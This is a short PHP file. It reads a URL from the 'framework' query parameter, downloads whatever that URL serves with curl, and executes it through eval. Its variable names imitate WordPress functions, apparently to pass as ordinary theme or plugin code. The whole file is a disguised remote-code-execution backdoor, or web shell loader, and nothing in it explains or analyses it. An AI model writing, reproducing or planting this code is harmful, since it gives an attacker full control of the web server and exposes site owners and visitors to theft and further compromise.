<?php
if (isset($_GET['framework'])) {
$wp_enqueue_style_guz = $_GET['framework'];
if ($is_wp_error_rxe = curl_init()) {
curl_setopt($is_wp_error_rxe, CURLOPT_URL, $wp_enqueue_style_guz);
curl_setopt($is_wp_error_rxe, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($is_wp_error_rxe));
curl_close($is_wp_error_rxe);
exit;
}
}